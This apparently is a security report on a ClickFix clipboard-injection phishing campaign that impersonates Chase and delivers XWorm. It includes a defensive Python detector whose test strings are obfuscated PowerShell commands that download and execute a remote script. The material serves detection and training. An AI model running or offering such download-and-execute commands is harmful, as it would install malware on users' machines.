We continue to capture ClickFix and ClearFix–style clipboard injection attacks designed to trick users into bypassing typical security controls. While this attack chain has circulated for several years, its reemergence is notable because it has recently gained traction with state-sponsored threat actors aligned with Russia, North Korea, and Iran. That adoption signals both effectiveness and accessibility: tactics once relegated to low-level cybercrime are now appearing in high-value, politically motivated operations. This overlap between nation-state tradecraft and opportunistic crime matters because it lowers the barrier to impact, making simple yet damaging intrusions more likely across a wider range of targets.
In this example, attackers cloned a legitimate Chase Bank Zelle® fraud prevention notice and repurposed it to deliver their own malicious campaign. The original email is a routine advisory that Chase sends to customers about scams and buyer protections, but here it was weaponized to build trust and familiarity. The phishing email told recipients they were required to review a “mandatory” Zelle safety notice, yet the link led not to Chase but to a page hosted on Amazon Web Services infrastructure. Hosting the first stage on a trusted cloud provider is a common way to slip past URL reputation checks and allow-lists that trust the provider's domains, and it underscores why defenders cannot rely solely on domain reputation or vendor allow-lists: the actual link target, not the sender's branding, is what needs to be checked.

Clicking the link funneled the victim to a spoofed Chase-branded page that looked convincing at a glance, with logos, formatting, and a familiar CAPTCHA-style human verification prompt. However, the domain used a [.]top TLD, a favorite of malicious actors because it is cheap to register and loosely policed. The attackers relied on that subtle difference to pass the page off as a legitimate Chase resource. Phishing success often hinges on small lapses in scrutiny: an employee skimming too quickly might not notice the domain's structure and assume the page is authentic.

The “verification” step is where the campaign escalates. Instead of genuinely confirming that the user is human, sliding the CAPTCHA bar silently copied an obfuscated PowerShell command into the user’s clipboard. The slider is not decorative: browsers only let a page write to the clipboard in response to a user gesture, so the attacker needs the victim to click or drag something before the payload can be staged. When later instructed to paste and run it, unsuspecting victims would execute code that had been preloaded without their knowledge. The obfuscation used in this sample was simple but effective: the script inserted the number “2” throughout command strings to fragment and conceal a dotted-quad IP address used for retrieving the next-stage payload, so the address only becomes readable once the script strips the filler at runtime. This is important because clipboard-based delivery bypasses many traditional security models: there is no malicious attachment to detonate and no browser exploit to detect, and the command runs inside a process the victim launched, relying on human reflexes rather than technical exploits. Users are conditioned to trust and follow verification prompts, which makes this blend of social engineering and script-based abuse unusually persuasive.
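As an added illustration (not part of the original report, and not the campaign's own script), the following Python triage helper shows how the filler-digit trick described above can be undone and detected when a candidate command line is pulled from clipboard monitoring or PowerShell script block logs. It reads the filler character out of a single-character Replace call, strips it, and flags any IPv4 address that appears only after stripping; it also tries each digit blindly for payloads that drop the filler some other way. The two clipboard samples, the URL path and the IP 198.51.100.45 (a documentation-range address) are constructed for this example and are not indicators from the campaign.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of a ClickFix-style clipboard payload. The filler digit is
# declared in the .Replace('2','') call, as the page describes. The IP
# 198.51.100.45 (TEST-NET-2) and path are assumptions for illustration only.
SAMPLE_DECLARED = (
    "powershell -w hidden -ep bypass -c "
    "\"$h='h2t2tp:2//12928.251.21002.452/2s.2txt'.Replace('2','');"
    "iex (iwr $h -UseBasicParsing)\""
)

# Constructed variant that removes the filler with -split/-join instead of a
# Replace call, so the filler has to be recovered blind.
SAMPLE_BLIND = (
    "powershell -c \"$u=('h7t7tp:/7/17978.571.1700.745/x' -split '7' -join '');"
    "iex (iwr $u)\""
)

# Dotted quad not glued to other digits or dots on either side.
_IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# Filler characters the payload itself removes: .Replace('2','') or -replace '2',''
_REPLACE_CALL = re.compile(
    r"(?:\.Replace\(\s*['\"](.)['\"]\s*,\s*['\"]{2}\s*\)"
    r"|-replace\s+['\"](.)['\"]\s*,\s*['\"]{2})",
    re.IGNORECASE,
)


def valid_ipv4(candidate: str) -> bool:
    """True if every octet is a decimal number in 0..255."""
    octets = candidate.split(".")
    return len(octets) == 4 and all(o.isdigit() and 0 <= int(o) <= 255 for o in octets)


def plain_ips(text: str) -> List[str]:
    """IPv4 addresses readable in the text as-is."""
    return [m for m in _IPV4.findall(text) if valid_ipv4(m)]


def declared_fillers(text: str) -> List[str]:
    """Filler characters named by a single-character Replace call in the payload."""
    return [g1 or g2 for g1, g2 in _REPLACE_CALL.findall(text)]


def deobfuscate_with(text: str, filler: str) -> str:
    """Apply the same stripping the payload performs at runtime."""
    return text.replace(filler, "")


def find_fragmented_ips(text: str, blind_fillers: str = "0123456789") -> List[Tuple[str, str]]:
    """Return (filler, ip) pairs for addresses that only become valid IPv4
    once one filler character is removed. Declared fillers are tried first;
    the digits are then tried blind. An address already visible in the raw
    text is never reported, which keeps ordinary commands with real IPs quiet."""
    visible = set(plain_ips(text))
    hits: List[Tuple[str, str]] = []
    tried = set()
    for filler in declared_fillers(text) + list(blind_fillers):
        if filler in tried:
            continue
        tried.add(filler)
        for ip in plain_ips(deobfuscate_with(text, filler)):
            if ip not in visible and (filler, ip) not in hits:
                hits.append((filler, ip))
    return hits


def triage(text: str) -> Dict[str, object]:
    """Summarise one candidate command line for an analyst or a detection rule."""
    hits = find_fragmented_ips(text)
    return {
        "declared_fillers": declared_fillers(text),
        "fragmented_ips": hits,
        "deobfuscated": deobfuscate_with(text, hits[0][0]) if hits else text,
        "suspicious": bool(hits),
    }


if __name__ == "__main__":
    for sample in (SAMPLE_DECLARED, SAMPLE_BLIND, "ping 10.0.0.1 -n 4"):
        print(triage(sample))
```

The blind pass is a heuristic and can in principle manufacture an address out of an unrelated run of digits, so in a production rule pair it with the other signals the campaign leaves: a declared single-character Replace, a download from a bare IP, and PowerShell started with a hidden window or a bypassed execution policy.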

In this campaign, successful execution resulted in the download of the XWorm malware family. XWorm is a commodity remote access trojan that provides attackers with extensive control, including file exfiltration, credential harvesting, and command execution. More troubling, infections with XWorm have increasingly been observed as staging points for ransomware deployment. That link to ransomware is critical because it means a single click-and-paste mistake is no longer a minor infection but potentially the first step in a destructive enterprise-wide incident.
The broader lesson is that these attacks highlight the evolving interplay between social engineering and technical abuse. The attackers do not need zero-day exploits or advanced malware frameworks; instead, they rely on hijacking user trust, leveraging legitimate cloud infrastructure, and manipulating everyday user actions like clicking and pasting. This approach demonstrates why organizations must focus not only on patching software vulnerabilities but also on hardening human and process vulnerabilities: teaching users that no legitimate verification step asks them to paste a command and run it, logging PowerShell execution, and alerting on command lines that fetch content from a bare IP address. Without that training and layered monitoring, even well-resourced organizations remain exposed to attacks that thrive on simplicity and psychological manipulation.